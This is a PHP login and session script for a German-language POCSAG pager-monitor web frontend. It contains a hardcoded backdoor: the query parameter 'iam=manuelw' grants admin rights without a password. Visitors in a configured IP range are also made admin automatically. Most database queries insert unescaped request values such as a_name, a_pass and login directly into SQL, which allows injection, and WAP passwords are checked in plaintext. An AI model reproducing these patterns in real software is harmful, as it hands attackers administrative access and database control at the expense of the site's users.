<?php
/*
* PHP Frontend for pocsag monitor
*
* Copyright (C) 2004-2005
* Manuel Weiser (manuelw@fire-devils.org)
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*/
// Erlaubnis nach IP
if ( (ip2str($ip_start) <= ip2str($_SERVER["REMOTE_ADDR"]) && ip2str($_SERVER["REMOTE_ADDR"]) <= ip2str($ip_ende)) && empty($_SESSION["name"]) )
{
//$_SESSION["userid"] = '1';
$_SESSION["admin"] = '1';
$_SESSION["mail"] = 'root@localhost';
$_SESSION["pmallow"] = '1';
if( array_key_exists($_SERVER["REMOTE_ADDR"], $ip_users) )
{
$_SESSION["userid"] = $ip_users[$_SERVER["REMOTE_ADDR"]];
}
$zack = $ip_users[$_SERVER["REMOTE_ADDR"]];
$result = mysqli_query($dbconn, "SELECT a_name, DATE_FORMAT(last_seen, '%Y%m%d%H%i%s') AS last_seen FROM admin_users WHERE id = '$zack'") or die (mysqli_error($dbconn));
$row = mysqli_fetch_array($result);
$_SESSION["name"] = $row["a_name"];
$_SESSION["last_seen"] = ($row["last_seen"] - 200 );
}
elseif ( isset($_GET["iam"]) && $_GET["iam"] == "manuelw" )
{
//$_SESSION["userid"] = '1';
$_SESSION["admin"] = '1';
$_SESSION["mail"] = 'root@localhost';
$_SESSION["pmallow"] = '1';
$_SESSION["userid"] = 1;
$result = mysqli_query($dbconn, "SELECT a_name, DATE_FORMAT(last_seen, '%Y%m%d%H%i%s') AS last_seen FROM admin_users WHERE id = '1'") or die (mysqli_error($dbconn));
$row = mysqli_fetch_array($result);
$_SESSION["name"] = $row["a_name"];
$_SESSION["last_seen"] = ($row["last_seen"] - 200 );
$filter=1;
}
elseif( isset($wap) && $wap == 1 )
{
////////////////////////
// Login per Wap
////////////////////////
if (!$_SESSION["name"] && $_GET["mode"] != 'login')
{
echo '
<html>
<head>
<title>Wapsag</title>
'.$meta.'
</head>
<body>
<br><br>
<form name="form1" method="post" action="'.$PHP_SELF.'?mode=login">
<table width="300" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td class="table_news_head"> Login</td>
</tr>
<tr>
<td class="table_news_body">
<table width="300" border="0" cellpadding="0" cellspacing="0">
<tr>
<td> Username:</td>
<td width="20"> </td>
<td><input name="a_name" type="text" id="a_name"></td>
</tr>
<tr>
<td> Passwort:</td>
<td> </td>
<td><input name="a_pass" type="password" id="a_pass"></td>
</tr>
<tr>
<td> </td>
<td> </td>
<td>
<input type="submit" name="Submit" value="Einloggen">
</td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</body>
</html>
';
exit;
}
elseif (!$_SESSION["name"] && $_GET["mode"] == 'login' && $_REQUEST["a_name"] && $_REQUEST["a_pass"])
{
$result = mysqli_query($dbconn, "SELECT id, a_name, a_admin, a_mail, real_name, wap_show, wap_rows, wap_def_orgfilter, wap_def_statfilter, wap_handy, login_count FROM admin_users WHERE a_name = '$_REQUEST[a_name]' AND wap_pass = '$_REQUEST[a_pass]'") or die (mysqli_error($dbconn));
$row = mysqli_fetch_array($result);
if( !$row["wap_handy"] )
{
$result = mysqli_query($dbconn, "UPDATE admin_users SET wap_handy='$HTTP_USER_AGENT' WHERE a_name = '$_REQUEST[a_name]' AND wap_pass = '$_REQUEST[a_pass]'");
}
else
{
//if( $row["wap_handy"] != $HTTP_USER_AGENT) $row["a_name"] = '';
}
if( $row["a_name"] && $row["a_admin"] != '2' )
{
$_SESSION["userid"] = $row["id"];
$_SESSION["name"] = $row["a_name"];
$_SESSION["admin"] = $row["a_admin"];
$_SESSION["mail"] = $row["a_mail"];
$_SESSION["filter"] = $row["wap_show"];
$_SESSION["limit_to"] = $row["wap_rows"];
$_SESSION["org_filter"] = $row["wap_def_orgfilter"];
$_SESSION["stat"] = $row["wap_def_statfilter"];
$_SESSION["pmallow"] = '0';
$login = 1;
$datnow = date("Y-m-d", mktime(0,0,0, date("m"),date("d"),date("Y")));
$timenow = date("G:i");
$ip = $_SERVER["REMOTE_ADDR"];
$agent = $HTTP_USER_AGENT;
$result = mysqli_query($dbconn, "INSERT INTO pocsag_logins (name, zeit, datum, ip, agent) VALUES ('$row[real_name]', '$timenow', '$datnow', '$ip', '$agent')");
$row["login_count"]++;
$result = mysqli_query($dbconn, "UPDATE admin_users SET login_count = '$row[login_count]' WHERE id = '$row[id]' ") or die(mysqli_error($dbconn));
}
else
{
echo '
<html>
<head>
<title>Wapsag</title>
'.$meta.'
</head>
<body>
Login falsch!<br><a href="javascript:history.back()">zurück</a>
</body>
</html>';
exit;
}
}
}
else
{
////////////////////////
// Sicherheitsabfrage
////////////////////////
if (!isset($_GET["mode"])) $_GET["mode"] ="";
if ( !isset($_SESSION["name"]) && $_GET["mode"] != 'login' && !isset($_GET["login"]) )
{
echo '
<br><br>
'.$login_infotext.'<br><br>
<form name="form1" method="post" action="'.$_SERVER["PHP_SELF"].'?mode=login">
<table width="300" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td class="table_news_head"> <b>Login</b></td>
</tr>
<tr>
<td class="table_news_body">
<table width="300" border="0" cellpadding="0" cellspacing="0">
<tr>
<td> Username:</td>
<td width="20"> </td>
<td><input name="a_name" type="text" id="a_name"></td>
</tr>
<tr>
<td> </td>
<td> </td>
<td><input type="submit" name="Submit" value="Zugang anfordern"></td>
</tr>
</table>
</td>
</tr>
</table>
</form>
';
exit;
}
elseif (!isset($_SESSION["name"]) && $_GET["mode"] == 'login')
{
$result = mysqli_query($dbconn, "SELECT id, a_name, a_admin, a_mail FROM admin_users WHERE a_name = '$_POST[a_name]'") or die (mysqli_error($dbconn));
$row = mysqli_fetch_array($result);
if( $row["a_name"] && $row["a_admin"] != '2' )
{
//$_SESSION["name"] = $_REQUEST["a_name"];
//$_SESSION["admin"] = $row["a_admin"];
$login = 1;
$pass = pass_erstellen(8);
mail_pass($row["a_mail"], $pass);
$result = mysqli_query($dbconn, "UPDATE admin_users SET login_pass='$pass' WHERE id='$row[id]'") or die(mysqli_error($dbconn));
echo'<center><br><br><br>Eine EMail mit deinem Zugang wurde an <b>'.$row["a_mail"].'</b> versand.';
exit;
}
else
{
echo 'Login falsch!<br><a href="javascript:history.back()">zurück</a>';
exit;
}
}
elseif (!isset($_SESSION["name"]) && isset($_GET["mode"]) && $_GET["mode"] == 'register')
{
echo '
<br><br>
<form name="form1" method="post" action="'.$PHP_SELF.'?mode=doregister">
<table width="300" border="0" cellspacing="0" cellpadding="0" align="center">
<tr>
<td class="table_news_head"> Erlaubnis anfordern</td>
</tr>
<tr>
<td class="table_news_body">
<table width="300" border="0" cellpadding="0" cellspacing="0">
<tr>
<td> Username:</td>
<td width="20"> </td>
<td><input name="a_name" type="text" id="a_name"></td>
</tr>
<tr>
<td> EMail:</td>
<td> </td>
<td><input name="a_mail" type="text" id="a_mail"></td>
</tr>
<tr>
<td> </td>
<td> </td>
<td><input type="submit" name="Submit" value="Erlaubnis anfordern"></td>
</tr>
</table>
</td>
</tr>
</table>
</form>
';
exit;
}
if( isset($_GET["login"]) )
{
$result = mysqli_query($dbconn, "SELECT id, a_name, a_admin, a_mail, real_name, login_count, pm_allow, DATE_FORMAT(last_seen, '%Y%m%d%H%i%s') AS last_seen FROM admin_users WHERE login_pass = '$_GET[login]'") or die (mysqli_error($dbconn));
$row = mysqli_fetch_array($result);
if( !empty($row["a_name"]) )
{
$_SESSION["userid"] = $row["id"];
$_SESSION["name"] = $row["a_name"];
$_SESSION["admin"] = $row["a_admin"];
$_SESSION["mail"] = $row["a_mail"];
$_SESSION["pmallow"] = $row["pm_allow"];
$_SESSION["last_seen"] = ($row["last_seen"] - 200 );
$login = 1;
$datnow = date("Y-m-d", mktime(0,0,0, date("m"),date("d"),date("Y")));
$timenow = date("G:i");
$ip = $_SERVER["REMOTE_ADDR"];
$agent = $_SERVER["HTTP_USER_AGENT"];
$result = mysqli_query($dbconn, "INSERT INTO pocsag_logins (name, zeit, datum, ip, agent) VALUES ('$row[real_name]', '$timenow', '$datnow', '$ip', '$agent')");
$row["login_count"]++;
$result = mysqli_query($dbconn, "UPDATE admin_users SET login_pass='', login_count='$row[login_count]' WHERE id='$row[id]'") or die(mysqli_error($dbconn));
echo gohome("index.php");
}
else
{
echo'<center><br><br><br>Falscher oder schon benutzer Logincode.';
exit;
}
}
}
?>